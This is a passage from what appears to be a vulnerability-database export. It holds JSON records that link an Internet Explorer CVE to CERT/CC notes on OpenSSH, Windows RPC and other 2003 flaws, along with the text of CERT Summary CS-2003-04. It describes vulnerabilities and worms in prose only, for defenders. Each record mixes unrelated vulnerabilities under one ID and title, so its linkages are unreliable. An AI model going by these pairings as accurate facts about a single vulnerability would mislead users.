"author": "CARNEGIE MELLON",
"id": "VU#333628",
"trust": 0.8,
"value": "28.98"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#483492",
"trust": 0.8,
"value": "94.50"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#326746",
"trust": 0.8,
"value": "27.00"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#254236",
"trust": 0.8,
"value": "94.50"
},
{
"author": "CNNVD",
"id": "CNNVD-200003-002",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "CNNVD",
"id": "CNNVD-200003-002"
},
{
"db": "NVD",
"id": "CVE-2000-0201"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The window.showHelp() method in Internet Explorer 5.x does not restrict HTML help files (.chm) to be executed from the local host, which allows remote attackers to execute arbitrary commands via Microsoft Networking. Versions of the OpenSSH server prior to 3.7.1 contain buffer management errors. While the full impact of these vulnerabilities are unclear, they may lead to memory corruption and a denial-of-service situation. A vulnerability exists in Microsoft\u0027s Remote Procedure Call (RPC) implementation. A remote attacker could exploit this vulnerability to cause a denial of service. An exploit for this vulnerability is publicly available. There is a remote buffer overflow in many versions of Microsoft Windows that allows attackers to execute arbitrary code with system privileges. We are sending this message to help ensure that\nadministrators have not overlooked one or more of these vulnerabilities. \n\nThere have been several recent vulnerabilities affecting OpenSSH. It is unclear if these issues \n are exploitable, but they are resolved in version 3.7.1. These four additional \n flaws are believed to be relatively minor, and are scheduled to be\n included in the next version of OpenSSH. \n Exploitation of this vulnerability may lead to a remote attacker \n gaining privileged access to the server, in some cases root access. \n\nVU#209807 - Portable OpenSSH server PAM conversion stack corruption\nhttp://www.kb.cert.org/vuls/id/209807\n\n There is a vulnerability in portable versions of OpenSSH 3.7p1 and\n 3.7.1p1 that may permit an attacker to corrupt the PAM conversion\n stack. \n\nPlease check the vulnerability notes for resolutions and additional \ndetails. \n\nThank you. 
\n-----BEGIN PGP SIGNED MESSAGE-----\n\nCERT Summary CS-2003-04\n\n November 24, 2003\n\n Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT\n Summary to draw attention to the types of attacks reported to our\n incident response team, as well as other noteworthy incident and\n vulnerability information. The summary includes pointers to sources of\n information for dealing with the problems. \n\n Past CERT summaries are available from:\n\n CERT Summaries\n http://www.cert.org/summaries/\n ______________________________________________________________________\n\nRecent Activity\n\n Since the last regularly scheduled CERT summary, issued in September\n 2003 (CS-2003-03), we have documented vulnerabilities in the Microsoft\n Windows Workstation Service, RPCSS Service, and Exchange. \n We have received reports of W32/Swen.A, W32/Mimail variants, and\n exploitation of an Internet Explorer vulnerability reported in August\n of 2003. \n\n For more current information on activity being reported to the\n CERT/CC, please visit the CERT/CC Current Activity page. The Current\n Activity page is a regularly updated summary of the most frequent,\n high-impact types of security incidents and vulnerabilities being\n reported to the CERT/CC. The information on the Current Activity page\n is reviewed and updated as reporting trends change. \n\n CERT/CC Current Activity\n http://www.cert.org/current/current_activity.html\n\n\n 1. W32/Mimail Variants\n\n The CERT/CC has received reports of several new variants of the\n \u0027Mimail\u0027 worm. The most recent variant of the worm (W32/Mimail.J)\n arrives as an email message alleging to be from the Paypal\n financial service. The message requests that the recipient\n \u0027verify\u0027 their account information to prevent the suspension of\n their Paypal account. Attached to the email is an executable file\n which captures this information (if entered), and sends it to a\n number of email addresses. 
\n\n Current Activity - November 19, 2003\n http://www.cert.org/current/archive/2003/11/19/archive.html#mimaili\n\n\n 2. \n\n CERT Advisory CA-2003-28\n\t\tBuffer Overflow in Windows Workstation Service\n http://www.cert.org/advisories/CA-2003-28.html\n\n Vulnerability Note VU#567620\n\t\tMicrosoft Windows Workstation service vulnerable to \n\t\tbuffer overflow when sent specially crafted network\n\t\tmessage\n http://www.kb.cert.org/vuls/id/567620\n\n\n 3. \n\n CERT Advisory CA-2003-27\n\t\tMultiple Vulnerabilities in Microsoft Windows and \n\t\tExchange\n http://www.cert.org/advisories/CA-2003-27.html\n\n Vulnerability Note VU#575892\n\t\tBuffer overflow in Microsoft Windows Messenger Service\n http://www.kb.cert.org/vuls/id/575892\n\n Vulnerability Note VU#422156\n\t\tMicrosoft Exchange Server fails to properly handle\n\t\tspecially crafted SMTP extended verb requests\n http://www.kb.cert.org/vuls/id/422156\n\n Vulnerability Note VU#467036\n\t\tMicrosoft Windows Help and support Center contains buffer\n\t\toverflow in code used to handle HCP protocol\n http://www.kb.cert.org/vuls/id/467036\n\n Vulnerability Note VU#989932\n\t\tMicrosoft Windows contains buffer overflow in Local \n\t\tTroubleshooter ActiveX control (Tshoot.ocx)\n http://www.kb.cert.org/vuls/id/989932\n\n Vulnerability Note VU#838572\n\t\tMicrosoft Windows Authenticode mechanism installs ActiveX\n\t\tcontrols without prompting user\n http://www.kb.cert.org/vuls/id/838572\n\n Vulnerability Note VU#435444\n\t\tMicrosoft Outlook Web Access (OWA) contains cross-site\n\t\tscripting vulnerability in the \"Compose New Message\" form\n http://www.kb.cert.org/vuls/id/435444\n\n Vulnerability Note VU#967668\n\t\tMicrosoft Windows ListBox and ComboBox controls vulnerable\n\t\tto buffer overflow when supplied crafted Windows message\n http://www.kb.cert.org/vuls/id/967668\n\n\n 4. 
Multiple Vulnerabilities in SSL/TLS Implementations\n\n Multiple vulnerabilities exist in the Secure Sockets Layer (SSL)\n and Transport Layer Security (TLS) protocols allowing an attacker\n to execute arbitrary code or cause a denial-of-service condition. \n\n CERT Advisory CA-2003-26\n\t\tMultiple Vulnerabilities in SSL/TLS Implementations\n http://www.cert.org/advisories/CA-2003-26.html\n\n Vulnerability Note VU#935264\n\t\tOpenSSL ASN.1 parser insecure memory deallocation\n http://www.kb.cert.org/vuls/id/935264\n\n Vulnerability Note VU#255484\n\t\tOpenSSL contains integer overflow handling ASN.1 tags (1)\n http://www.kb.cert.org/vuls/id/255484\n\n Vulnerability Note VU#380864\n\t\tOpenSSL contains integer overflow handling ASN.1 tags (2)\n http://www.kb.cert.org/vuls/id/380864\n\n Vulnerability Note VU#686224\n\t\tOpenSSL does not securely handle invalid public key when\n\t\tconfigured to ignore errors\n http://www.kb.cert.org/vuls/id/686224\n\n Vulnerability Note VU#732952\n\t\tOpenSSL accepts unsolicited client certificate messages\n http://www.kb.cert.org/vuls/id/732952\n\n Vulnerability Note VU#104280\n\t\tMultiple vulnerabilities in SSL/TLS implementations\n http://www.kb.cert.org/vuls/id/104280\n\n Vulnerability Note VU#412478\n\t\tOpenSSL 0.9.6k does not properly handle ASN.1 sequences\n http://www.kb.cert.org/vuls/id/412478\n\n\n 5. Exploitation of Internet Explorer Vulnerability\n\n The CERT/CC received a number of reports indicating that attackers\n were actively exploiting the Microsoft Internet Explorer\n vulnerability described in VU#865940. These attacks include the\n installation of tools for launching distributed denial-of-service\n (DDoS) attacks, providing generic proxy services, reading\n sensitive information from the Windows registry, and using a\n victim system\u0027s modem to dial pay-per-minute services. 
The\n vulnerability described in VU#865940 exists due to an interaction\n between IE\u0027s MIME type processing and the way it handles HTML\n application (HTA) files embedded in OBJECT tags. \n\n CERT Advisory IN-2003-04\n\t\tExploitation of Internet Explorer Vulnerability\n http://www.cert.org/incident_notes/IN-2003-04.html\n\n Vulnerability Note VU#865940\n\t\tMicrosoft Internet Explorer does not properly evaluate\n\t\t\"application/hta\" MIME type referenced by DATA attribute\n\t\tof OBJECT element\n http://www.kb.cert.org/vuls/id/865940\n\n\n 6. W32/Swen.A Worm\n\n On September 19, the CERT/CC began receiving a large volume of\n reports of a mass mailing worm, referred to as W32/Swen.A,\n spreading on the Internet. Similar to W32/Gibe.B in function, this\n worm arrives as an attachment claiming to be a Microsoft Internet\n Explorer Update or a delivery failure notice from qmail. The\n W32/Swen.A worm requires a user to execute the attachment either\n manually or by using an email client that will open the attachment\n automatically. Upon opening the attachment, the worm attempts to\n mail itself to all email addresses it finds on the system. The\n CERT/CC updated the current activity page to contain further\n information on this worm. \n\n Current Activity - September 19, 2003\n http://www.cert.org/current/archive/2003/09/19/archive.html#swena\n\n\n 7. Buffer Overflow in Sendmail\n\n Sendmail, a widely deployed mail transfer agent (MTA), contains a\n vulnerability that could allow an attacker to execute arbitrary\n code with the privileges of the sendmail daemon, typically root. \n\n CERT Advisory CA-2003-25\n\t\tBuffer Overflow in Sendmail\n http://www.cert.org/advisories/CA-2003-25.html\n\n Vulnerability Note VU#784980\n\t\tSendmail prescan() buffer overflow vulnerability\n http://www.kb.cert.org/vuls/id/784980\n\n\n 8. 
\n\n CERT Advisory CA-2003-23\n\t\tRPCSS Vulnerabilities in Microsoft Windows\n http://www.cert.org/advisories/CA-2003-23.html\n\n Vulnerability Note VU#483492\n\t\tMicrosoft Windows RPCSS Service contains heap overflow in\n\t\tDCOM activation routines\n http://www.kb.cert.org/vuls/id/483492\n\n Vulnerability Note VU#254236\n\t\tMicrosoft Windows RPCSS Service contains heap overflow in\n\t\tDCOM request filename handling\n http://www.kb.cert.org/vuls/id/254236\n\n Vulnerability Note VU#326746\n\t\tMicrosoft Windows RPC service vulnerable to \n\t\tdenial of service\n http://www.kb.cert.org/vuls/id/326746\n ______________________________________________________________________\n\nNew CERT Coordination Center (CERT/CC) PGP Key\n\n On October 15, the CERT/CC issued a new PGP key, which should be used\n when sending sensitive information to the CERT/CC. \n\n CERT/CC PGP Public Key\n https://www.cert.org/pgp/cert_pgp_key.asc\n\n Sending Sensitive Information to the CERT/CC\n https://www.cert.org/contact_cert/encryptmail.html\n ______________________________________________________________________\n\nWhat\u0027s New and Updated\n\n Since the last CERT Summary, we have published new and updated\n * Advisories\n http://www.cert.org/advisories/\n * Vulnerability Notes\n http://www.kb.cert.org/vuls\n * CERT/CC Statistics\n http://www.cert.org/stats/cert_stats.html\n * Congressional Testimony\n http://www.cert.org/congressional_testimony\n * Training Schedule\n http://www.cert.org/training/\n * CSIRT Development\n http://www.cert.org/csirts/\n ______________________________________________________________________\n\n This document is available from:\n http://www.cert.org/summaries/CS-2003-04.html\n ______________________________________________________________________\n\nCERT/CC Contact Information\n\n Email: cert@cert.org\n Phone: +1 412-268-7090 (24-hour hotline)\n Fax: +1 412-268-6989\n Postal address:\n CERT Coordination Center\n Software Engineering Institute\n Carnegie 
Mellon University\n Pittsburgh PA 15213-3890\n U.S.A. \n\n CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) /\n EDT(GMT-4) Monday through Friday; they are on call for emergencies\n during other hours, on U.S. holidays, and on weekends. \n\nUsing encryption\n\n We strongly urge you to encrypt sensitive information sent by email. \n Our public PGP key is available from\n http://www.cert.org/CERT_PGP.key\n\n If you prefer to use DES, please call the CERT hotline for more\n information. \n\nGetting security information\n\n CERT publications and other security information are available from\n our web site\n http://www.cert.org/\n\n To subscribe to the CERT mailing list for advisories and bulletins,\n send email to majordomo@cert.org. Please include in the body of your\n message\n\n subscribe cert-advisory\n\n * \"CERT\" and \"CERT Coordination Center\" are registered in the U.S. \n Patent and Trademark Office. \n ______________________________________________________________________\n\n NO WARRANTY\n Any material furnished by Carnegie Mellon University and the Software\n Engineering Institute is furnished on an \"as is\" basis. Carnegie\n Mellon University makes no warranties of any kind, either expressed or\n implied as to any matter including, but not limited to, warranty of\n fitness for a particular purpose or merchantability, exclusivity or\n results obtained from use of the material. Carnegie Mellon University\n does not make any warranty of any kind with respect to freedom from\n patent, trademark, or copyright infringement. \n ______________________________________________________________________\n\n Conditions for use, disclaimers, and sponsorship information\n\n Copyright \\xa92003 Carnegie Mellon University. 
\n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP 6.5.8\n\niQCVAwUBP8JVOZZ2NNT/dVAVAQGL9wP+I18NJBUBuv7b0pam5La7E7qOQFMn5n78\n7i0gBX/dKgaY5siM6jBYYwCbbA7Y0/Jwtby2zHp1s8RHZY5/3JEzElfv4TLlR8rT\nrb8gJDbpan2JWA6xH9IzqZaSrxrXpNypwU2wWxR2osmbYl8FdV0rD3ZYXJjyi+nU\nUENALuNdthA=\n=DD60\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2000-0201"
},
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "PACKETSTORM",
"id": "31735"
},
{
"db": "PACKETSTORM",
"id": "32268"
}
],
"trust": 3.96
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#326746",
"trust": 2.5
},
{
"db": "CERT/CC",
"id": "VU#254236",
"trust": 1.7
},
{
"db": "CERT/CC",
"id": "VU#483492",
"trust": 1.7
},
{
"db": "NVD",
"id": "CVE-2000-0201",
"trust": 1.6
},
{
"db": "BID",
"id": "1033",
"trust": 1.6
},
{
"db": "CERT/CC",
"id": "VU#333628",
"trust": 1.0
},
{
"db": "SECUNIA",
"id": "10156",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200003-002",
"trust": 0.6
},
{
"db": "CERT/CC",
"id": "VU#602204",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#209807",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "31735",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#784980",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#575892",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#255484",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#865940",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#467036",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#380864",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#838572",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#422156",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#412478",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#935264",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#686224",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#104280",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#567620",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#989932",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#967668",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#435444",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#732952",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "32268",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "PACKETSTORM",
"id": "31735"
},
{
"db": "PACKETSTORM",
"id": "32268"
},
{
"db": "CNNVD",
"id": "CNNVD-200003-002"
},
{
"db": "NVD",
"id": "CVE-2000-0201"
}
]
},
"id": "VAR-200003-0033",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2024-07-22T21:37:32.184000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2000-0201"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://www.microsoft.com/technet/security/bulletin/ms03-039.asp"
},
{
"trust": 1.7,
"url": "http://www.kb.cert.org/vuls/id/326746"
},
{
"trust": 1.6,
"url": "http://support.microsoft.com/?kbid=825750"
},
{
"trust": 1.6,
"url": "http://support.microsoft.com/?kbid=827363"
},
{
"trust": 1.6,
"url": "http://www.cert.org/advisories/ca-2003-19.html"
},
{
"trust": 1.6,
"url": "http://cgi.nessus.org/plugins/dump.php3?id=11835"
},
{
"trust": 1.6,
"url": "http://www.iss.net/support/product_utilities/xfrpcss.php"
},
{
"trust": 1.6,
"url": "http://www.ntbugtraq.com/dcomrpc.asp"
},
{
"trust": 1.6,
"url": "http://securecomputing.stanford.edu/alerts/win-rpc-10sept2003.html"
},
{
"trust": 1.6,
"url": "http://www.coresecurity.com/common/showdoc.php?idx=393\u0026idxseccion=10"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/1033"
},
{
"trust": 0.9,
"url": "http://www.kb.cert.org/vuls/id/254236"
},
{
"trust": 0.9,
"url": "http://www.kb.cert.org/vuls/id/483492"
},
{
"trust": 0.8,
"url": "http://www.openssh.com/txt/buffer.adv"
},
{
"trust": 0.8,
"url": "http://www.mindrot.org/pipermail/openssh-unix-announce/2003-september/000062.html"
},
{
"trust": 0.8,
"url": "http://www.freebsd.org/cgi/cvsweb.cgi/ports/security/openssh/files/patch-buffer.c"
},
{
"trust": 0.8,
"url": "http://www.secunia.com/advisories/10156/"
},
{
"trust": 0.8,
"url": "http://www.eeye.com/html/research/advisories/ad20030910.html"
},
{
"trust": 0.8,
"url": "http://www.eeye.com/html/research/tools/rpcdcom.html"
},
{
"trust": 0.8,
"url": "http://www.xfocus.org/advisories/200307/4.html"
},
{
"trust": 0.8,
"url": "http://www.nsfocus.com/english/homepage/research/0306.htm"
},
{
"trust": 0.2,
"url": "http://www.cert.org/"
},
{
"trust": 0.2,
"url": "http://www.kb.cert.org/vuls/id/333628"
},
{
"trust": 0.2,
"url": "http://www.cert.org/cert_pgp.key"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/209807"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/jarl-5rfqqz."
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/602204"
},
{
"trust": 0.1,
"url": "http://www.cert.org/summaries/cs-2003-04.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/412478"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/567620"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/104280"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/686224"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/575892"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/732952"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/989932"
},
{
"trust": 0.1,
"url": "http://www.cert.org/current/archive/2003/09/19/archive.html#swena"
},
{
"trust": 0.1,
"url": "http://www.cert.org/summaries/"
},
{
"trust": 0.1,
"url": "http://www.cert.org/stats/cert_stats.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/784980"
},
{
"trust": 0.1,
"url": "http://www.cert.org/training/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/838572"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/967668"
},
{
"trust": 0.1,
"url": "http://www.cert.org/current/current_activity.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-28.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-27.html"
},
{
"trust": 0.1,
"url": "https://www.cert.org/contact_cert/encryptmail.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/incident_notes/in-2003-04.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/435444"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-26.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-24.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-25.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-23.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/935264"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/467036"
},
{
"trust": 0.1,
"url": "https://www.cert.org/pgp/cert_pgp_key.asc"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/255484"
},
{
"trust": 0.1,
"url": "http://www.cert.org/current/archive/2003/11/19/archive.html#mimaili"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/865940"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/380864"
},
{
"trust": 0.1,
"url": "http://www.cert.org/congressional_testimony"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/422156"
},
{
"trust": 0.1,
"url": "http://www.cert.org/csirts/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "PACKETSTORM",
"id": "31735"
},
{
"db": "PACKETSTORM",
"id": "32268"
},
{
"db": "CNNVD",
"id": "CNNVD-200003-002"
},
{
"db": "NVD",
"id": "CVE-2000-0201"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "PACKETSTORM",
"id": "31735"
},
{
"db": "PACKETSTORM",
"id": "32268"
},
{
"db": "CNNVD",
"id": "CNNVD-200003-002"
},
{
"db": "NVD",
"id": "CVE-2000-0201"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-09-16T00:00:00",
"db": "CERT/CC",
"id": "VU#333628"
},
{
"date": "2003-09-10T00:00:00",
"db": "CERT/CC",
"id": "VU#483492"
},
{
"date": "2003-07-31T00:00:00",
"db": "CERT/CC",
"id": "VU#326746"
},
{
"date": "2003-09-10T00:00:00",
"db": "CERT/CC",
"id": "VU#254236"
},
{
"date": "2003-09-29T22:44:34",
"db": "PACKETSTORM",
"id": "31735"
},
{
"date": "2003-11-25T05:25:51",
"db": "PACKETSTORM",
"id": "32268"
},
{
"date": "2000-03-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200003-002"
},
{
"date": "2000-03-01T05:00:00",
"db": "NVD",
"id": "CVE-2000-0201"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-08-12T00:00:00",
"db": "CERT/CC",
"id": "VU#333628"
},
{
"date": "2003-12-11T00:00:00",
"db": "CERT/CC",
"id": "VU#483492"
},
{
"date": "2003-09-10T00:00:00",
"db": "CERT/CC",
"id": "VU#326746"
},
{
"date": "2003-12-11T00:00:00",
"db": "CERT/CC",
"id": "VU#254236"
},
{
"date": "2005-05-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200003-002"
},
{
"date": "2021-07-23T12:18:31.047000",
"db": "NVD",
"id": "CVE-2000-0201"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200003-002"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "OpenSSH contains buffer management errors",
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200003-002"
}
],
"trust": 0.6
}
}
VAR-200107-0045
Vulnerability from variot - Updated: 2024-07-04 22:18
Internet Explorer 5.5 and earlier allows remote attackers to obtain the physical location of cached content and open the content in the Local Computer Zone, then use compiled HTML help (.chm) files to execute arbitrary programs. Versions of the OpenSSH server prior to 3.7.1 contain buffer management errors. While the full impact of these vulnerabilities is unclear, they may lead to memory corruption and a denial-of-service situation. A vulnerability exists in Microsoft's Remote Procedure Call (RPC) implementation. A remote attacker could exploit this vulnerability to cause a denial of service. An exploit for this vulnerability is publicly available. Certain versions of Microsoft Internet Explorer (IE) that support double-byte character sets (DBCS) contain a buffer overflow vulnerability in the Type attribute of the OBJECT element. A remote attacker could execute arbitrary code with the privileges of the user running IE. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ Internet Explorer has a problem with XML style sheet processing: even if scripting is disabled in the security zone, the script will be executed. Many MUAs, including Outlook Express, display XML documents using IE components, so the script may be executed just by displaying the mail. Please refer to the “Overview” for the impact of this vulnerability. We are sending this message to help ensure that administrators have not overlooked one or more of these vulnerabilities.
There have been several recent vulnerabilities affecting OpenSSH. It is unclear if these issues are exploitable, but they are resolved in version 3.7.1. These four additional flaws are believed to be relatively minor, and are scheduled to be included in the next version of OpenSSH. Exploitation of this vulnerability may lead to a remote attacker gaining privileged access to the server, in some cases root access.
VU#209807 - Portable OpenSSH server PAM conversion stack corruption http://www.kb.cert.org/vuls/id/209807
There is a vulnerability in portable versions of OpenSSH 3.7p1 and 3.7.1p1 that may permit an attacker to corrupt the PAM conversion stack.
Please check the vulnerability notes for resolutions and additional details.
Thank you.
CERT Summary CS-2003-04
November 24, 2003
Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information.
Past CERT summaries are available from:
CERT Summaries
http://www.cert.org/summaries/
Recent Activity
Since the last regularly scheduled CERT summary, issued in September 2003 (CS-2003-03), we have documented vulnerabilities in the Microsoft Windows Workstation Service, RPCSS Service, and Exchange. We have received reports of W32/Swen.A, W32/Mimail variants, and exploitation of an Internet Explorer vulnerability reported in August of 2003.
For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change.
CERT/CC Current Activity
http://www.cert.org/current/current_activity.html
1. W32/Mimail Variants
The CERT/CC has received reports of several new variants of the
'Mimail' worm. The most recent variant of the worm (W32/Mimail.J)
arrives as an email message alleging to be from the Paypal
financial service. The message requests that the recipient
'verify' their account information to prevent the suspension of
their Paypal account. Attached to the email is an executable file
which captures this information (if entered), and sends it to a
number of email addresses.
Current Activity - November 19, 2003
http://www.cert.org/current/archive/2003/11/19/archive.html#mimaili
2.
CERT Advisory CA-2003-28
Buffer Overflow in Windows Workstation Service
http://www.cert.org/advisories/CA-2003-28.html
Vulnerability Note VU#567620
Microsoft Windows Workstation service vulnerable to
buffer overflow when sent specially crafted network
message
http://www.kb.cert.org/vuls/id/567620
3.
CERT Advisory CA-2003-27
Multiple Vulnerabilities in Microsoft Windows and
Exchange
http://www.cert.org/advisories/CA-2003-27.html
Vulnerability Note VU#575892
Buffer overflow in Microsoft Windows Messenger Service
http://www.kb.cert.org/vuls/id/575892
Vulnerability Note VU#422156
Microsoft Exchange Server fails to properly handle
specially crafted SMTP extended verb requests
http://www.kb.cert.org/vuls/id/422156
Vulnerability Note VU#467036
Microsoft Windows Help and support Center contains buffer
overflow in code used to handle HCP protocol
http://www.kb.cert.org/vuls/id/467036
Vulnerability Note VU#989932
Microsoft Windows contains buffer overflow in Local
Troubleshooter ActiveX control (Tshoot.ocx)
http://www.kb.cert.org/vuls/id/989932
Vulnerability Note VU#838572
Microsoft Windows Authenticode mechanism installs ActiveX
controls without prompting user
http://www.kb.cert.org/vuls/id/838572
Vulnerability Note VU#435444
Microsoft Outlook Web Access (OWA) contains cross-site
scripting vulnerability in the "Compose New Message" form
http://www.kb.cert.org/vuls/id/435444
Vulnerability Note VU#967668
Microsoft Windows ListBox and ComboBox controls vulnerable
to buffer overflow when supplied crafted Windows message
http://www.kb.cert.org/vuls/id/967668
4. Multiple Vulnerabilities in SSL/TLS Implementations
Multiple vulnerabilities exist in the Secure Sockets Layer (SSL)
and Transport Layer Security (TLS) protocols allowing an attacker
to execute arbitrary code or cause a denial-of-service condition.
CERT Advisory CA-2003-26
